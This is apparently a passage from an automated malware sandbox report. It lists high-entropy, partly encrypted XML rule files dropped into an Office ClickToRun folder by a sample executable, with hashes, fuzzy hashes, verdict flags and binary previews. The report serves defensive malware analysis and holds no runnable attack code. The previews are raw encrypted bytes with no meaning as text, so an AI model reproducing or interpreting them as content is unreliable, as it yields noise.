                                                                                                                                      SSDEEP:24:l4o1PnGt+BN8B9LufsT21tQgscqcH1ZtTTpSwQPs4nrxZbD:J1vDeCfH1tQgflH1nUZE8r/D
                                                                                                                                      MD5:F035D9A229B05B07E3480A0C946EE169
                                                                                                                                      SHA1:313B486FDFF73BF5E2F00D83B867BE1FE3C47E38
                                                                                                                                      SHA-256:4DDF6B644431F0BC27F03FB8F9598283A891146E0C02F8874C787B18E4EE6C25
                                                                                                                                      SHA-512:5529FF28F1603C98744445957DFD93B401AC2806EB5AC0B3D0564BA6C30A960B3B2123D19583AD35F384839746367B5DFB3122F396389EB0EEA0A7EC610DBC5C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?{.wt<$bI._."....b?K.W..#|F.5.y.U9.}h..[.x.1...5.<..J?....,..u..._..\<.PP.9.........b-.......uw.......:.'.....I..X....n..T......u..JX..8.:.Z.4.U...>...6..n\-S./.HS.....:...w....cR.....sT......R<..z.w..i U...%..........w....NB...p.'..m..R.~.8d.(...^....nF.}...N..........>...|(LJ.#FvM,....?...^..%.v<M6.]:.:;L.."~J........i.H.......Yc.$-5V.....&....TTX.2SS.'.J..y^..&<...v...q..p2W...~.A"C.r.#z.....N...1.T...B;.@.5....T.s.y.....f.......{......J.=, .....<......k..K....B...y.\G......."%...&X.v~.P$..+.aaj....9v..RsEf...........=..`..p.qe.......0..j].tMJD.....=.Q3.5..,...+............+..r{.j.f.Y.aU.2.g*.[.:..C..Tq..U...JY.(....s..y...C..]..8./...X......#G...{Y...|... .G.5..t...~...3..q...BI.!..e.a...|'|I.'........]...?!4...I8.Y.e[...p..u....j&.;G.FQ...J...Ffj..*@d.P..{S.1 %Q....>..5'I..w..L/...x4.......... .._q#.I.S.".o.f(.............L.7.n.a....b.O.....f?W/6.._h.c....$<.x..%<d.&.D.....'.(.....~(..J.Z.Q5.Y......h tD......i...2..n.]i..m...(o.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230166v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1101
                                                                                                                                      Entropy (8bit):7.80060951272286
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:wwq9oniUSFwwFy9fmgheYWBveSjz6eg8raQh0aVyYceaTfpCGnKbD:wwmoniUSFww89mghvUGr8OQaaVZHaTZ0
                                                                                                                                      MD5:F0B2CF9D55317B520CDC22F34E083FFA
                                                                                                                                      SHA1:33D901344FA5DFE0539E6E8156F54226F125FDB8
                                                                                                                                      SHA-256:77CA7F74EBC6EBEA9D513B44DB99390A2B08FAEA81FA77678FDF15B3322FC237
                                                                                                                                      SHA-512:ED1E142F6CB7F7F2D10EC7567F2E69042200E481C36B339D6EBF3DD562BC35E37DCF6BD2BBE2CBA84188A528AEB32F459B0AF298ED6B888279580BAD5E8F0760
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?HuX..R4;>SO..f....>R...m...2..q...McJ.{e..o...../....A...}.9-.!.R..ZVu..y.yq..*.qy..q...+..\...p.%.V.....[....9.5...5G.N.Xk. ....B8....x..'.'.....B..8.7l....h..q7&...).Nd..T..Z?.]..?..F'.|..{Z.....NM%. Py..9......Ew...~..w.U\=...oN.Y..4.%..n.o.P.ll.tQR.:..v..g.......7.Z...D..`.........R_2......F&g......(../...x..<..d.'N...J.yb.....b1*bj.~.]i.v./'Bc+..^..jP/.................^.C.k.lW...e+..l.dP...us... <v.3..+.F{..i1.)...UG....."}.P).,........../.3m.HF......6].;..5Fw.).y^......D.lO.k,G...Q..u.wR.....x...9o.c...Y...v.9p7>.{..l.......2..c.dN^3........\y,.5...h?kB....o...b..LL..\..t.......@j.s..qH..0.%/v..u.o.A.....2..e.V..#..2.p.d>...c....B..'..E.3...Iq=0.Oq...[H_..F.s.X..O...%.R2.D.<:...~+......7K ....U........i..~..-._...9..;'..pu..^r.....y6.wI.yxPv.MD..v..|.SiZ.......?..'.D..]...7.b.l.Y...Ix;.V...-........O2);....;..q...@f..j.....3n;.%.%Qe7.>...[..:..e.O....7.KM........L.B..t..1.a..1......y...R).-.f..>O..p..u......*)'......pf$.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230167v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1713
                                                                                                                                      Entropy (8bit):7.908594273414501
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:MOI1qNAUwy57d6Tag/KJa7dBmwvp7zruNLdQQz8ss3sYRLPdWGD:MOIYHZ7MTB/BRcLd6s+PdWe
                                                                                                                                      MD5:A5E9B7CD9003CE0F8AFD6E54127AAE85
                                                                                                                                      SHA1:0FD713EFB51258C7E606553BA33A5D8C8D570FA9
                                                                                                                                      SHA-256:D08B0271F5FD46C31CD2C23553156A4684255E3E0DDD8007686EE6352E53B3DD
                                                                                                                                      SHA-512:438BD1A137F823E5310AF24327359F075BE3CAF00EC7E1E09E27C9E8B1FD46339086AA18CA9B2CEA664EB93BF3DBB1E40C268DA902ADA2FAFBCEF885DCF90BC7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?ip.td....a!..r.]6+.......}.n.....r..............+K..$.g:N..|...K..#.jP.........P..X...]....S....4...&?z....r.y...Y+....(Oqh..j.y.'U........D.[.$]..R. 2.8,[...7.o..`....-C.s...$.....3.^..c.6~R9r.......2i_}M...2~......fa....(b....[...f...|Z.Xh..s...s...>s.._./.p=.!...=.......'V.?./g.%.....b......4..0..s@..?..R.4....._.zP#..;..u..}.)..+.q.....E,%.........9......%..)N.......Z...).kv.{x-.....P.%.._...=.&.;...G..G....K.j!.F`..j..H0..=.#N.S.....vz.:.4mu.5.i.,.F....<P5...E........f.[?..... ..G.K?.*..O..5.....2.^.K,d.V....I....]gz.....v......%......y.^.....w..l...zSU......L...a.s.... ..Vl!p.B?.{,..x.M.yL...H.}.S.G%}3..\...P.~t..~F.G......v?Y.8.....^..h;@. ..+^.....[...l.~......^..%'.......!...Yg..~./..N...d.YU....._...Z......>%tHP_O..]..pi.............c......l*.a....9...PK..}W...{...!~..J.uV.l(....."...... ..wu...)'-./~(7..l.>...>2....`....Fb\Z.a.\4.|.v&".`...".O|..a.#$Q..$...P.f.:..>.q\*.m.\...:..u...1.)....so.Bw$(..`....f..L'.xWZO.0;.......%T

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230168v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3441
                                                                                                                                      Entropy (8bit):7.943532314949929
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:fdbc0fn2c5sjZ3y4THqZ6T+mh7myP8antI/or:fVl/2njZ3y4TKkT+mh7mTatTr
                                                                                                                                      MD5:62759C36459D773DCFD2C448D36F48B1
                                                                                                                                      SHA1:2EE3B537997B2636CC2BFE224E166601949F7201
                                                                                                                                      SHA-256:BCE4D18F84BC6C27751AC83D0BC86FA30BF358D8C2B02908E6082596DAE6DD8B
                                                                                                                                      SHA-512:FB8563F84E2D02468435874B9107428D2A439EFA7AF728EF723C7CDE1E1D57F29843DC911915C27450DD496D9CC060D9D4787084BAAC01034F18652480C2F299
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?.r..X[ze1.........1s.b........n...|.~<.9..q!.2~oh....G{..>[.?r...KI...):.J..y..N.rds..El...+NjnF..l.8....We..*..!..A...T.C/B.......U..u....9.`B.....9"..+.76..._-hb}.`.|:.@;\.g.......}...p....V...u7.-.{..3L.............)..:.X]....&. M.... ...Z`..S.......H.r....z....a..R.^W...J..,g..w....=w.N...Y...{...*S.-.g......>.1..2...=!^78-!....[..7.$...)V.gN.....j!.Q.-.a...&y.}~}JA..U.Q....F1).}...G.(....0...pS.8...-K"e..[...~{........h@.Zbt..M.'.qgdx...*vc."......+.^m.*./...:[..n.7i..Ku.r..:..(..\.$......+(.9Y.P.^...5n.cf.RF2..+..pw.kd.&....E.y.m...2.0......v.om...h.9..B.}.h.e..@ .\.8V]oB..fU[m..m.l.C`..T..\+u..o...e....5.I.[`...\.K.In.....^=..5.`..T.c...u.5.~Q .#.....3....K....N|...Jc*\.t....E..'y....X=S.1J.........9.wJ..3..Cz.".6..`..B.f#...E..:...&...7.8.-...4.r....[j..N.6..dIu.86.1h....R.e...Ea(X.........u.Z3.0.R.....K.K.H.<f...(.O....(.......p.F.TI..u:3....~4.c:.$^.7.d.h.H...Bg*.....8.4.&W.^\d.I..d.L.Q..b9E...*.\....nR...3.7iR...M%

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230169v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):7736
                                                                                                                                      Entropy (8bit):7.97727190099318
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:kNq1mvurRaE045OcoqMmXa0DsLQQUcEmFhfev7NNnv:mP2rwE0hcRDDsDxEAhWbv
                                                                                                                                      MD5:5E05DE74722E2025A4EA2180062E37C6
                                                                                                                                      SHA1:1D24949C9EF4FB66255A18136301312D24451FAD
                                                                                                                                      SHA-256:437B5CCAC7BC306E0D8A38A8BB43465E15FE4CAE28460431687551A5B07BD0EF
                                                                                                                                      SHA-512:0F92D835E960F6CC7AFB5D4F5EE05FE381F4A85B04A773D29A5CB2222DFFBC852DFDFDA127B6739FF6BEDCCAAF54E8F637BAD53F1D36EB7A7DEFBAC3D54BF32E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?X.}..Tj].4E...L..7.K.S..kP........72..A....}.a....D..x.LgH-.t.Jpo .y.1..u$0%...`&.....cx5|.W....Z.Z..YT. ...+....V.;E...sQ.^/..<l.7m.a.....5w...R.l..^.Uu.L#...x.L..q.t....m.h.(L)......JM..:b...dH..'..b...7|....."<=Z&..j..h"..."..`..C..}e...KH.....:_..."Z..TGF.._.Yu.J.}X....\..s.&V.T.k.........}..g....9.....M@..HkD......M......y.V..CI.lT..d..]....^z....r..K5p.....+*UY..m......>.G......o....Hp..jdx.?=.".....y...z...%RuUv.?..D....+...Wq'.gC.*.5..G.Gp..m....}.:d...K.c.A%....F..~y.."|....Btn.<K-.s.'.9I...W..V.}I.....9......)..aU)C..'......(/..K.8F>=.c......}n........z...S.......v..O..OTW..w.bx.$G./...P.9X.,.....J......]l...{.......w/..B......yG.x.s..f...K.%Rji....z4...j:f.^..Nc..e .gp>s....&[(7.'.69Fs|."I..M.%.#..RY......q>w~F.w....pu$Yv.!}_..^...HG-.\...x.=...6`..P.......2B4....].e^..Z.iI.PI..4...M_.k.W#.......A.yT..|..8.H.:...(..-.v.J..j~....d..I.3['K.n.#...L.....0...{w.42H..p.......#.].o7:...L..s....kV.k.V.U=..v.... .N..+....<.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230170v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):23959
                                                                                                                                      Entropy (8bit):7.992352156100114
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:384:AWQzrRfxLtJlUno46gnKI08JvtEPR2vKktz3TibUmjxWxCE7JGBvl1klAwK6BunL:T6RfxJmor008VkCKmz3yUmjxwn8DOAxD
                                                                                                                                      MD5:5828F31DDEC06E80B7D7392A79A2444D
                                                                                                                                      SHA1:EF6E2E88AF581C93CD93F52D7E38868160072051
                                                                                                                                      SHA-256:9B5166CD9162C0B05C3E43B30EB9DF798EF9D05D99B524F592A6E6C1702B62A0
                                                                                                                                      SHA-512:D656C06540D5CD4BF85995F37760C1F6CF0415F1DFC2C9385297D80ABD5C01D79DD230082EE9E3630403FCE69396D1EF03D25A5A9E0D27CEB505182B7436A7E9
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:.<?^..sV..]=..S+.H..8@9.)6._..].nGty[.....=..QN3o...L>....^@.V"=_.7...4...)7`.)..*.......s.......$.X+Lk../..m.-.*.x.U.....E.|...wpI.Rt......O..s@...%=..g......b..>....{..tIK......Vp...\s....&..Ie...)+..,.E....B.#gb.5V2.2rr.O...%v..^...........T..FGd.o...KS.2...4._.C....Fr..@=.%'\;V$.*..&.S.>.0..:.x$.}~(}&...=v..?.0d.N...].i0v.#.7.H.4OW.p.?.N.m..S.\HF.?..Z.4Xj.rpz.L.8..-..@.p.kh...s'.....2..h.P.$E..@E._.>%..>g0...........m...K*-E,/3bk.>.I.......2......Jv.....0..K."dw....E.%...r......I...<...h"..:.b...{.z...na..%...........F...>}..~e.x..{..2....8^...~op.L@..f.r..N........m...A"..'rQ...t.(E|.l-.0[.h_T.Ez .B/.....i8.wx.L......0....z... ~@..m.=..../.m.N-.....q...J..!..! ..w.;.......~..k.1..)`..T...7: bG#g.......[.FN..Q7N........Xk.E....~v*%_.(r.....U.~..G.;...<.. .~[.!...%.CX.E......2..`#. ..:.HC.?..C|..u..dc..R..6...).N...~C*.G.b\.$f+i.......,.On..U....[...h..v..:.V....<;G.5^-..4)3......p.B......}kcWd.....c.....|....D.......

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230171v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1768
                                                                                                                                      Entropy (8bit):7.909322504647624
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:X48pohob6ebLQRmONOuDY6NFbtQizog67dwdYD:XvwC5bsmONOgY6jBu7dz
                                                                                                                                      MD5:C1B76041DBA66949EA74E6FB4D3B4BBB
                                                                                                                                      SHA1:3553A133781615EF65191CC7AC08007221D86746
                                                                                                                                      SHA-256:7F221B1F6E008D34B00EAC553A3A1A2BABDE59A0B5752DCEA86A9CE633F9983A
                                                                                                                                      SHA-512:B485D7B7BCFB9DD2FB0A7AB3BDAE7FA540E457780777B7025DE94CD2B28554A940E002690B4A16C4FD44A3A560C8EEDA1937FC3FC7BF663FFE5680785BEE6C63
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?..`....,.E...`".8^ZK=....NO.X...8...S...L........>.p`N.8d!}X.N.x.....y*..(........i.j.t.....:S..:.QC..)ai.....Bp+.J.O. .l..|./o .=..6ko<$..o..e/..j....3.<.....z<............U.,M.(.a.kB...|...P..7e..*..)e..y....K.*..X..h(..;OSV...}...^]<........V.H......A.9>r._.:M..>Xpm.fa...|.%.dqW^...kM..8./.B.Yq.g./...w57....F.....F`%f.........Kzo.C$.{:+.y.?.)..r.......`.~2.........;.5..0dIp..2h.L:.<..T...`...t...q.M..4Y.kvL../.W.M...........N.....U.m........BVS/0.....n&=..'.....@.~.D.6.?SuA.a...r:}..>}...6L.t.n........%.B.".P...T.l.qb>.Y...N..n..5_!FS....L........=...-...s.....'.We...../.m.g.:1..n...Q..]..B..f.6.Hv..N...t.f.H2...S.L....i].SN.S.2.*.s....b.C...!..G7....Ke .45 .HA.B.f.q. .....p....).....:r...._.c..MZ.{.%.....Wt.3..s.vu.sG...DC..n.d....xBZ.......!.mc....]..)...f.W.%...;x.=...k~.....g^..W?#.7.T.....b^5..*.....1{..#...z..V./...v..g~....)..+=Pv..rx....R/.5.`+P.4.]....-...Y.4.c...l.TQ...!J..Sz.L..B..O...I....?m..... .7...l.l.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230172v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):31745
                                                                                                                                      Entropy (8bit):7.9948541287039685
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:Q/X3LbniCr98Fdi/PbYwf0CwhbzRyvnrrMVq/VV82IgC3tnfuf2Hxl56Hg3:SF98FeYdzkvn0w/VV82IgeGf2Hxl5N3
                                                                                                                                      MD5:C190F6F87ECE1EE43BC0992ACD14FE59
                                                                                                                                      SHA1:A069D4ED77B1B6E71F1BE1544FA17C550C72BF00
                                                                                                                                      SHA-256:AA2B9901602A1A89BFAA0DD2DEB64F09E35D38DBED7FBA2C1AB9DAA39940E0ED
                                                                                                                                      SHA-512:747FD78D50EE150C43AA95A175904D440AC81838E9EFAAC5BF2E52647959516D1EB068571D2FDC0CFAE2A15F73218E6E1425FA8B1097E10FB73791C974D6B147
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:.<?H.....'.?....^%..e.W...-....QyY9V=8IpI....t....+.r...9...c..`g:.....;d...W.............f.=.T..-..N,.F..E....t},/.|...L.K..b..,..N.e._.o.."...p..Ra.g.*2?p...i.!.H..)Ljf..........#....kC...L..5.8~..v3/......J.h.@..4Z..m..<...*....\.6.....S..E.>.......{X4....ILL..#.S............O...l.S..>..^..?'........q.1...M.....V...{&.p.q...M. .,.#N.:ho......b.Q.+..m...D}....g.)....k.;.T@....7.c.....G..H.Z;.!{..B.19..f....B:.e$.k.-..`.tz...w[..F.l.........p.+.....+_.7.Lg..G.....Lx:..O.K.I...}.^... ;.c..q.z.#._.4.......e.>7....&...Y.G.S.Q..P";e.nX.w...... .^$.O...w........T..h.x...1tlB.7.,.m.a....,......5.U>.h?B..`..\W.N..3.b....!X.w3+~4.Cpx..!.7"....xW...gw....R.).{cjyyCVy.U.wu....e!.)o..o..'2z...0=..^..j..L..C.O.v.|Wa@.PM-.=@3..........cb...j0..Yr ..9....O..]N..U.9*..!..o..ad..A...e.+1w.Ku\.N.Jk.J.....#..&:(q.p.J...9B.2...#0....U..}.o...>..=.Q<.V/.\.i.5L.n)N.CK.QC.....dd..3....F"Cz#.3..jc55...f.>.m...._..........i?nTA..v-.....D...O;..6.w.2~..5.CV

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230173v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6373
                                                                                                                                      Entropy (8bit):7.971045968358166
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:KsvREJfQY+8kMkr/jy/HKqK5NG+Pbf1AvKwXdN9QKoAhw8RE/TbilhuCwtqmL6F0:JSJc8kMK/jg+PbteJmAu8Ss1Ty
                                                                                                                                      MD5:427EA044E533982B7BE1153783F1CB5B
                                                                                                                                      SHA1:5B8DF65E9432E63CCF8EAD973715046E5043403F
                                                                                                                                      SHA-256:C595E1D4BB5604E3A7DD0B64B0ECE7660AA4B7F77DD7B91B43ED5D4A2A5EF8D7
                                                                                                                                      SHA-512:E54B149F5828A45836AEA891345E871FCD5D2798F8B4CA3A7A4199563D85457CA395AAAE4E7F2456A716A7C14168BA17AB6BEC0F7A61247099DE0B5F4161FB7E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?...h0..../.b....=...?...o.GR..Py..yD...3...a.....51......~.!._.Z..Y........*$)|..^...{).%E..I.j.r|.*r...@..4%......H.A.vztx....+|6Y1..d[..~..+..WOj..F..O. ..t..r;;h.:..r+.F.H9ZA.....!$..U.....KJ..0.5....q.d..'...<P......./.2.`..5&y2Y.>.....pN/.....S*\.....E.F`..+.c..K.%....iY.V.....r.x......."....z..Q.^.=.r.+P......M..Lw....Z....7A.M....@.gZ..X.../5h.<U@.5../J..R.]z.z.5.<.z.....7.\+.....,...."K..#|....'./....;..2..WNP.....8cg....wD.=.n..K:@..DK.g.G...y63.$..ot`...k...=B47k.s..X..D.~.YD........?.....n.EW6:..+..Z...hdq..!.._..p...0....;>.5:(..q...r...sp.l.si/..hn.U6..h...N..5.z:.8.y%...j{.Z.....1..F..`0q.ud..|....ZbYX.cfb.O..V....h...j<Y.0^E....\...v....%ii..,NYC...W..\Z...Q......0.~...7..z..?.(..\.k.]......R....&}....%.u..F.P..........84.K./.ue.c&YI.~..,..V..<EB%..,.C..X.*.#....XM.....q.].m....Z.l.>..y..K.P.5.S...\.8...>[u..oo.W?....#.x..Zb..;?.L.......m..>...z7.b..<..D=.#...v...j.....R..c..G.2T....L.Ta....B.k.2..3.s.........B

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230174v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2483
                                                                                                                                      Entropy (8bit):7.917652064797298
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:OwP3l4tQERkRQKN86Z5+JG7FLrdlmKxXfoQwQV+lW4lCDn54ZaZ4AqEXemXZD:OwS3XKeTGZreKxXfbV+44lCRZ1qEXVR
                                                                                                                                      MD5:10F6F571A6703960254C59EB300F5F28
                                                                                                                                      SHA1:8B83B594087431C317D7CC3C5FF775E0A1C54D82
                                                                                                                                      SHA-256:FBBB08960005743ECB8919058DB2E897731F288604E7A523CC629B85D9697E55
                                                                                                                                      SHA-512:E7F0B481167B871BE4F732863B04C6458A057C1C466E1027C95EA90FAFE66D65B79E54C84201F7EFC4967A5E29150A689047F6E5EF1D59A172E831DC9A90FEE3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?R..gN..g.a...L..gh._.".)/K....E#Cx.lh...%.ko..L..S...tn??....^wjv.1..F..f\.c...p.%...._...^..G....q|...k...H..... .m.........B^ ...Z...O.+$...p.F.....G.G..b./.B..*.@...]..`..l@,..]...0...,....L+h..O..)!..b..kG.z.r....]....Mb#.f..v....a\."......X..0.A.C.$..qwBE...ZyG.;.;yx....`....!i.4# ?(.>.....'.JIxQO.K....o..........#d%QE..{.{(.....za5.Rn.$...z.?..j.....i..X,bV............S.8....L.W....T..s./s.9!W.K....qo...q.W.y..?.U0.J.'&..M{........y?e.6.p...B...#-.M...........s`.$...._v{&.:..y\+Q.3.+.M......;].<.>JG=..BG...]I..TD.ng..o..3..A....%.`T.oQ0....SPy.ay.....N.YG....;KyG.<.@.jH./...M.....(.ll........r9qA#..v....z....V.{`e..v]..[.IdX.*FK_6.. .~4 ...:..]\N..f!...(=.5Y....W.V.....D.B....f...2.y$..d)....X.K.B..P....P46@..-./.JH.j{P.[.ck6...v..D...e.....U^|..?yj]W!..%0fy...O:pW...e............-s.....f...P.....>..e#)M6).=+...BD..........)2..iv.......R..w=.E..:.F.Z&.QH..-.c.I9P.iv.0:L.RA.....f.|B.G.U......\\...^(dp..B[..`E.....Z.*.,........-

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule460008v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):785
                                                                                                                                      Entropy (8bit):7.7182785733742785
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:7uRmnWX9w775QIdwzbjtEnk6I5pWeU0ji5e5R12bD:qmnMd7jqnkNjU0j0mWD
                                                                                                                                      MD5:A46F0B4F55CAB14F658E532C8E8DAD54
                                                                                                                                      SHA1:758EBD5987547B4DB314420EDE7722B326650C1D
                                                                                                                                      SHA-256:BACB54B26CB84826C25DB1D80D47043F7B5167080859AF0AC8EB734DB409D4FD
                                                                                                                                      SHA-512:95BBB44C89EC863D820B1FBCF85646934AE7152C4B8CE63F5C5EFBDF109F53A018FDB8ED50BAE04A51521F382E96D455C4AD62D947C54889B9ED7DDE49AE6A00
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.=.r..6.....m.,i~.4.s...F9....4.G^g.F....M&l.@P.bBS..[*...W.....{......7...7...q...T4YU..ANY.A..YK.j...!....<.1uB2)...X... .......".j....;.. ......A.6...G=....&...a.\.Np....F..=7.a.7..xV..!...j^.t..]...9BIklU.A{..e..\:..?].M...E...@.=ea.o]....W.n.6.........'9C.)..?.;..'E*.cyT...x.....mKE.NJ...#w..0Mf...8.._~....p....)_..iH..R....!..(.b....2A..2....... 1..b..K...FIc.V...fzPn..H.vYw.....J*.=....}o..a3Z/3.bRy..yxf...~g9..LX@.f@.o....../..R{[`.7..=%M**}.Y..R..I.......o...D9...a.c.z.#xv..c..~P.'".....P.8....j..z.,(.........$.b....N.9-..%....q........[<.......c.V.........Uow.G..5K.g.\*.....@....:'x...z..K...:W...U..E.b.......A....8...6....,'.....9.SAQ.......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule460009v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):752
                                                                                                                                      Entropy (8bit):7.717160960044292
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:BBlg0PbJnceKzEvnKPvUu1nSb10LBYrOi/csWLH2LS7ZIg1E9042gHUUMoWIShIG:+0VnRKzEvKPMu1s0LmbKWC2GEnfHOoWj
                                                                                                                                      MD5:C30FFEC6074B0673F330B0A4EF1E8DE2
                                                                                                                                      SHA1:DFFE9CF2B2A7B14BD7926837D2B1C5E51D91B940
                                                                                                                                      SHA-256:0AD79CA271CD97F1ABB2CD209219E9F0B18C949BC33B7005369C7FEDACB3074B
                                                                                                                                      SHA-512:5EF186DC4F5F5B2A7905E6559A3FCB48503535AEE1B8914DCB712B6F435451D54D597A0246B72A417A1FA6CFD4115A77F768B0AD55AB44F62C50989C164F7096
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlB...f6S.C..j...\ ..q..<.5u.....Qm.gVm...HM5..!..Y.{.....<....\./.|.=.........-...U.51L....;$...M...j...D3.r...t( ..1.x@.,.......2B.._%...............V,s.E...4,.!.D...-..?_..^+...6...mmF.$. ..."}>SLh.......\\9:....@2...(.....D..Ii....(.!.S.p..2( .>A..\....T...f9.I.PA..X...ql&.K1..(....O3.E....N..e.....z.....nC...~J$...S:...!HJ61b#...<.+.&..L.Q...]U.......d#.w.ug.>......6....O..*.N..%O....w.>v....3.H..D...u.T.9..P].....s.a...z.nrb...Q.......K....q..gja....@f..(..l_.~...{..dy.q..:Dl.......f..g.6.a..d~...m..,`.g.o._k.h~i..n......K.....".rbj2?o.D...|.....Y[.{...O....\~......|H....^T..1..o....r.s.O..Y.'8]O.F.!X...!..s9..LFm..5.....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700000v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2038
                                                                                                                                      Entropy (8bit):7.918225459962278
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:WlFukFAXukZFELkWXA7MDjpGf4le5w2dLWVD:WnukF2qxXA79Qld8Wt
                                                                                                                                      MD5:57F43FB9A684CD35941440269E81E34F
                                                                                                                                      SHA1:8AA7FD1FE20F7A7570047AF5F1F5B9BD16D7B243
                                                                                                                                      SHA-256:E3A4FC6CCD80180858A27FCA8AFA8DD731E66FE120BF5C0E6DF075055AB4BA7B
                                                                                                                                      SHA-512:5D01CE4FCD47EA6D49BAF50CE8B0B2E4CC6A493495AD16BF71E4AE70CBDFA0ABBCB4ED2BEA4C297B7D1F7382C75D0010A9F33E10855D99C5B9F727A00ADD4610
                                                                                                                                      Malicious:false
